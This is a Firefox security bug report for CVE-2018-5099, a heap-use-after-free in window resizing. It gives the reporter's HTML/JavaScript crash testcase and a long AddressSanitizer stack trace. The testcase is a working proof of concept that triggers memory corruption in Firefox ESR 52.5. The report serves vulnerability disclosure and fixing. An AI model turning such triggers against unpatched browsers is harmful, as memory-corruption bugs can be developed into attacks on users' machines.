Closed
Bug 1416878
(CVE-2018-5099)
Opened 7 years ago
Closed 6 years ago
heap-use-after-free in nsWebShellWindow::WindowResized
Categories
(Core :: DOM: Core & HTML, defect, P2)
Tracking
()
RESOLVED
FIXED
mozilla59
People
(Reporter: nils, Assigned: freesamael, NeedInfo)
Details
(Keywords: csectype-uaf, sec-high, Whiteboard: [adv-main58+][adv-esr52.6+][post-critsmash-triage])
Attachments
(5 files, 4 obsolete files)
|
583 bytes,
text/html
|
Details | |
|
62.47 KB,
text/plain
|
Details | |
|
16.15 KB,
patch
|
Details | Diff | Splinter Review | |
|
14.65 KB,
patch
|
gchang
:
approval-mozilla-beta+
gchang
:
approval-mozilla-release+
|
Details | Diff | Splinter Review |
|
13.56 KB,
patch
|
gchang
:
approval-mozilla-esr52+
|
Details | Diff | Splinter Review |
The following testcase crashes the latest ASAN build of Firefox ESR 52.5.0 (SourceStamp=f9df5238dca13e40b8128faba317df25e2f69249). It requires the fuzzPriv extension and might need a few attempts to reproduce. Loading the testcase in multiple tabs at the same time helps with reproducibility.
crash.html:
<script>
function spin () {
var x=new XMLHttpRequest();
x.open("POST","https://mozilla.org",false);
try{x.send("X");}catch(e){}
}
function start () {
o1=window.open('data:text/html,<div>','popup54','height=1');
window.top.setTimeout(fun0, 400);
}
function fun0() {
o1.onresize=fun1;
o1.resizeTo(10,-40961);
o1.resizeBy(1,-16);
}
var x=0;
function fun1() {
if(x++) return;
o1.close();
for(var x=0; x<10; x++) spin();
fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();
window.setTimeout("location.reload()",100);
}
</script>
<body onload="start()"></body>
ASAN output:
=================================================================
==5553==ERROR: AddressSanitizer: heap-use-after-free on address 0x61200022e6db at pc 0x7fce4a05c116 bp 0x7ffcb1e3c310 sp 0x7ffcb1e3c308
READ of size 1 at 0x61200022e6db thread T0
#0 0x7fce4a05c115 in IsLocked /home/worker/workspace/build/src/xpfe/appshell/nsXULWindow.h:74:35
#1 0x7fce4a05c115 in WindowResized /home/worker/workspace/build/src/xpfe/appshell/nsWebShellWindow.cpp:302
#2 0x7fce4a05c115 in non-virtual thunk to nsWebShellWindow::WindowResized(nsIWidget*, int, int) /home/worker/workspace/build/src/xpfe/appshell/nsWebShellWindow.cpp:294
#3 0x7fce488a5d62 in DispatchResized /home/worker/workspace/build/src/widget/gtk/nsWindow.cpp:550:9
#4 0x7fce488a5d62 in nsWindow::Resize(double, double, bool) /home/worker/workspace/build/src/widget/gtk/nsWindow.cpp:1140
#5 0x7fce4a071c2c in nsXULWindow::SetSize(int, int, bool) /home/worker/workspace/build/src/xpfe/appshell/nsXULWindow.cpp:624:17
#6 0x7fce44d51f3e in nsGlobalWindow::ResizeByOuter(int, int, mozilla::ErrorResult&, bool) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:7965:12
#7 0x7fce4633899d in mozilla::dom::WindowBinding::resizeBy(JSContext*, JS::Handle<JSObject*>, nsGlobalWindow*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:3467:3
#8 0x7fce4632ff69 in mozilla::dom::WindowBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:15158:13
#9 0x7fce4cf39375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
#10 0x7fce4cf39375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
#11 0x7fce4cf3a022 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
#12 0x7fce4cca869c in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
#13 0x7fce4cc77ccf in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:333:14
#14 0x7fce4cc857bf in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:400:12
#15 0x7fce4cc87f6e in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:689:12
#16 0x7fce4cf39375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
#17 0x7fce4cf39375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
#18 0x7fce4cf1977f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
#19 0x7fce4cf1977f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
#20 0x7fce4cefe93d in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
#21 0x7fce4cf399df in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
#22 0x7fce4cf3a022 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
#23 0x7fce4ca0ac7d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
#24 0x7fce466d7769 in mozilla::dom::Function::Call(JSContext*, JS::Handle<JS::Value>, nsTArray<JS::Value> const&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/FunctionBinding.cpp:36:8
#25 0x7fce44d87167 in Call<nsCOMPtr<nsISupports> > /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/FunctionBinding.h:70:12
#26 0x7fce44d87167 in nsGlobalWindow::RunTimeoutHandler(mozilla::dom::Timeout*, nsIScriptContext*) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:13029
#27 0x7fce44d88f00 in nsGlobalWindow::RunTimeout(mozilla::dom::Timeout*) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:13308:32
#28 0x7fce44f68972 in mozilla::dom::(anonymous namespace)::TimerCallback(nsITimer*, void*) /home/worker/workspace/build/src/dom/base/Timeout.cpp:63:3
#29 0x7fce42435039 in nsTimerImpl::Fire(int) /home/worker/workspace/build/src/xpcom/threads/nsTimerImpl.cpp:479:7
#30 0x7fce4240948c in nsTimerEvent::Run() /home/worker/workspace/build/src/xpcom/threads/TimerThread.cpp:285:3
#31 0x7fce424254c2 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /home/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:161:15
#32 0x7fce42424e8f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /home/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:74:7
#33 0x7fce42417cab in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1216:7
#34 0x7fce42499dec in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:361:10
#35 0x7fce4872fa74 in mozilla::dom::XMLHttpRequestMainThread::SendInternal(mozilla::dom::XMLHttpRequestMainThread::RequestBodyBase const*) /home/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2956:14
#36 0x7fce4874bfb3 in mozilla::dom::XMLHttpRequestMainThread::Send(JSContext*, nsAString_internal const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.h:380:13
#37 0x7fce463eb4bb in mozilla::dom::XMLHttpRequestBinding::send(JSContext*, JS::Handle<JSObject*>, mozilla::dom::XMLHttpRequest*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/XMLHttpRequestBinding.cpp:781:7
#38 0x7fce46baa5f9 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2904:13
#39 0x7fce4cf39375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
#40 0x7fce4cf39375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
#41 0x7fce4cf1977f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
#42 0x7fce4cf1977f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
#43 0x7fce4cefe93d in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
#44 0x7fce4cf399df in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
#45 0x7fce4cf3a022 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
#46 0x7fce4cca869c in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
#47 0x7fce4cc77ccf in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:333:14
#48 0x7fce4cc857bf in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:400:12
#49 0x7fce4cc87f6e in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:689:12
#50 0x7fce4cf39375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
#51 0x7fce4cf39375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
#52 0x7fce4cf3a022 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
#53 0x7fce4ca0ac7d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
#54 0x7fce46593bcf in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
#55 0x7fce46fc430a in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
#56 0x7fce46fc430a in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
#57 0x7fce46f8e6ad in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1134:16
#58 0x7fce46f900d7 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1287:17
#59 0x7fce46f7ae36 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:380:5
#60 0x7fce46f7e4c8 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
#61 0x7fce4920a5f3 in PresShell::FireResizeEvent() /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:2038:5
#62 0x7fce492201a8 in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4122:7
#63 0x7fce4920e7e6 in FlushPendingNotifications /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4054:3
#64 0x7fce4920e7e6 in HandlePostedReflowCallbacks /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4022
#65 0x7fce4920e7e6 in PresShell::DidDoReflow(bool) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:9217
#66 0x7fce4920b1ad in PresShell::ResizeReflowIgnoreOverride(int, int, int, int) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:1974:7
#67 0x7fce487e5bb0 in DoSetWindowDimensions /home/worker/workspace/build/src/view/nsViewManager.cpp:192:7
#68 0x7fce487e5bb0 in nsViewManager::SetWindowDimensions(int, int, bool) /home/worker/workspace/build/src/view/nsViewManager.cpp:228
#69 0x7fce4917ffbf in nsDocumentViewer::SetBoundsWithFlags(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, unsigned int) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2005:5
#70 0x7fce4918012b in nsDocumentViewer::SetBoundsWithFlags(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, unsigned int) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2019:5
#71 0x7fce49f0812c in SetPositionAndSize /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5999:19
#72 0x7fce49f0812c in non-virtual thunk to nsDocShell::SetPositionAndSize(int, int, int, int, unsigned int) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5985
#73 0x7fce4511d224 in nsFrameLoader::UpdateBaseWindowPositionAndSize(nsSubDocumentFrame*) /home/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:2500:5
#74 0x7fce4511cc7e in nsFrameLoader::UpdatePositionAndSize(nsSubDocumentFrame*) /home/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:2472:3
#75 0x7fce4951fc6d in ReflowFinished /home/worker/workspace/build/src/layout/generic/nsSubDocumentFrame.cpp:817:5
#76 0x7fce4951fc6d in non-virtual thunk to nsSubDocumentFrame::ReflowFinished() /home/worker/workspace/build/src/layout/generic/nsSubDocumentFrame.cpp:812
#77 0x7fce4920e753 in HandlePostedReflowCallbacks /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4013:12
#78 0x7fce4920e753 in PresShell::DidDoReflow(bool) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:9217
#79 0x7fce4920b1ad in PresShell::ResizeReflowIgnoreOverride(int, int, int, int) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:1974:7
#80 0x7fce487e5bb0 in DoSetWindowDimensions /home/worker/workspace/build/src/view/nsViewManager.cpp:192:7
#81 0x7fce487e5bb0 in nsViewManager::SetWindowDimensions(int, int, bool) /home/worker/workspace/build/src/view/nsViewManager.cpp:228
#82 0x7fce4917ffbf in nsDocumentViewer::SetBoundsWithFlags(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, unsigned int) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2005:5
#83 0x7fce49f0812c in SetPositionAndSize /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5999:19
#84 0x7fce49f0812c in non-virtual thunk to nsDocShell::SetPositionAndSize(int, int, int, int, unsigned int) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5985
#85 0x7fce4a05c034 in WindowResized /home/worker/workspace/build/src/xpfe/appshell/nsWebShellWindow.cpp:298:5
#86 0x7fce4a05c034 in non-virtual thunk to nsWebShellWindow::WindowResized(nsIWidget*, int, int) /home/worker/workspace/build/src/xpfe/appshell/nsWebShellWindow.cpp:294
#87 0x7fce488a5d62 in DispatchResized /home/worker/workspace/build/src/widget/gtk/nsWindow.cpp:550:9
#88 0x7fce488a5d62 in nsWindow::Resize(double, double, bool) /home/worker/workspace/build/src/widget/gtk/nsWindow.cpp:1140
#89 0x7fce4a071c2c in nsXULWindow::SetSize(int, int, bool) /home/worker/workspace/build/src/xpfe/appshell/nsXULWindow.cpp:624:17
#90 0x7fce44d51f3e in nsGlobalWindow::ResizeByOuter(int, int, mozilla::ErrorResult&, bool) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:7965:12
#91 0x7fce4633899d in mozilla::dom::WindowBinding::resizeBy(JSContext*, JS::Handle<JSObject*>, nsGlobalWindow*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:3467:3
#92 0x7fce4632ff69 in mozilla::dom::WindowBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:15158:13
#93 0x7fce4cf39375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
#94 0x7fce4cf39375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
#95 0x7fce4cf3a022 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
#96 0x7fce4cca869c in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
#97 0x7fce4cc77ccf in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:333:14
#98 0x7fce4cc857bf in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:400:12
#99 0x7fce4cc87f6e in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:689:12
#100 0x7fce4cf39375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
#101 0x7fce4cf39375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
#102 0x7fce4cf1977f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
#103 0x7fce4cf1977f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
#104 0x7fce4cefe93d in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
#105 0x7fce4cf399df in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
#106 0x7fce4cf3a022 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
#107 0x7fce4ca0ac7d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
#108 0x7fce466d7769 in mozilla::dom::Function::Call(JSContext*, JS::Handle<JS::Value>, nsTArray<JS::Value> const&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/FunctionBinding.cpp:36:8
#109 0x7fce44d87167 in Call<nsCOMPtr<nsISupports> > /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/FunctionBinding.h:70:12
#110 0x7fce44d87167 in nsGlobalWindow::RunTimeoutHandler(mozilla::dom::Timeout*, nsIScriptContext*) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:13029
#111 0x7fce44d88f00 in nsGlobalWindow::RunTimeout(mozilla::dom::Timeout*) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:13308:32
#112 0x7fce44f68972 in mozilla::dom::(anonymous namespace)::TimerCallback(nsITimer*, void*) /home/worker/workspace/build/src/dom/base/Timeout.cpp:63:3
#113 0x7fce42435039 in nsTimerImpl::Fire(int) /home/worker/workspace/build/src/xpcom/threads/nsTimerImpl.cpp:479:7
#114 0x7fce4240948c in nsTimerEvent::Run() /home/worker/workspace/build/src/xpcom/threads/TimerThread.cpp:285:3
#115 0x7fce424254c2 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /home/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:161:15
#116 0x7fce42424e8f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /home/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:74:7
#117 0x7fce42417cab in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1216:7
#118 0x7fce42499dec in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:361:10
#119 0x7fce4872fa74 in mozilla::dom::XMLHttpRequestMainThread::SendInternal(mozilla::dom::XMLHttpRequestMainThread::RequestBodyBase const*) /home/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2956:14
#120 0x7fce4874bfb3 in mozilla::dom::XMLHttpRequestMainThread::Send(JSContext*, nsAString_internal const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.h:380:13
#121 0x7fce463eb4bb in mozilla::dom::XMLHttpRequestBinding::send(JSContext*, JS::Handle<JSObject*>, mozilla::dom::XMLHttpRequest*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/XMLHttpRequestBinding.cpp:781:7
#122 0x7fce46baa5f9 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2904:13
#123 0x7fce4cf39375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
#124 0x7fce4cf39375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
#125 0x7fce4cf1977f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
#126 0x7fce4cf1977f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
#127 0x7fce4cefe93d in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
#128 0x7fce4cf399df in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
#129 0x7fce4cf3a022 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
#130 0x7fce4cca869c in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
#131 0x7fce4cc77ccf in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:333:14
#132 0x7fce4cc857bf in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:400:12
#133 0x7fce4cc87f6e in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:689:12
#134 0x7fce4cf39375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
#135 0x7fce4cf39375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
#136 0x7fce4cf3a022 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
#137 0x7fce4ca0ac7d in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
#138 0x7fce46593bcf in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
#139 0x7fce46fc430a in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
#140 0x7fce46fc430a in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
#141 0x7fce46f8e6ad in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1134:16
#142 0x7fce46f900d7 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1287:17
#143 0x7fce46f7ae36 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:380:5
#144 0x7fce46f7e4c8 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
#145 0x7fce4920a5f3 in PresShell::FireResizeEvent() /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:2038:5
#146 0x7fce492201a8 in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4122:7
#147 0x7fce4920e7e6 in FlushPendingNotifications /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4054:3
#148 0x7fce4920e7e6 in HandlePostedReflowCallbacks /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4022
#149 0x7fce4920e7e6 in PresShell::DidDoReflow(bool) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:9217
#150 0x7fce4920b1ad in PresShell::ResizeReflowIgnoreOverride(int, int, int, int) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:1974:7
#151 0x7fce487e5bb0 in DoSetWindowDimensions /home/worker/workspace/build/src/view/nsViewManager.cpp:192:7
#152 0x7fce487e5bb0 in nsViewManager::SetWindowDimensions(int, int, bool) /home/worker/workspace/build/src/view/nsViewManager.cpp:228
#153 0x7fce4917ffbf in nsDocumentViewer::SetBoundsWithFlags(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, unsigned int) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2005:5
#154 0x7fce4918012b in nsDocumentViewer::SetBoundsWithFlags(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, unsigned int) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2019:5
#155 0x7fce49f0812c in SetPositionAndSize /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5999:19
#156 0x7fce49f0812c in non-virtual thunk to nsDocShell::SetPositionAndSize(int, int, int, int, unsigned int) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5985
#157 0x7fce4511d224 in nsFrameLoader::UpdateBaseWindowPositionAndSize(nsSubDocumentFrame*) /home/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:2500:5
#158 0x7fce4511cc7e in nsFrameLoader::UpdatePositionAndSize(nsSubDocumentFrame*) /home/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:2472:3
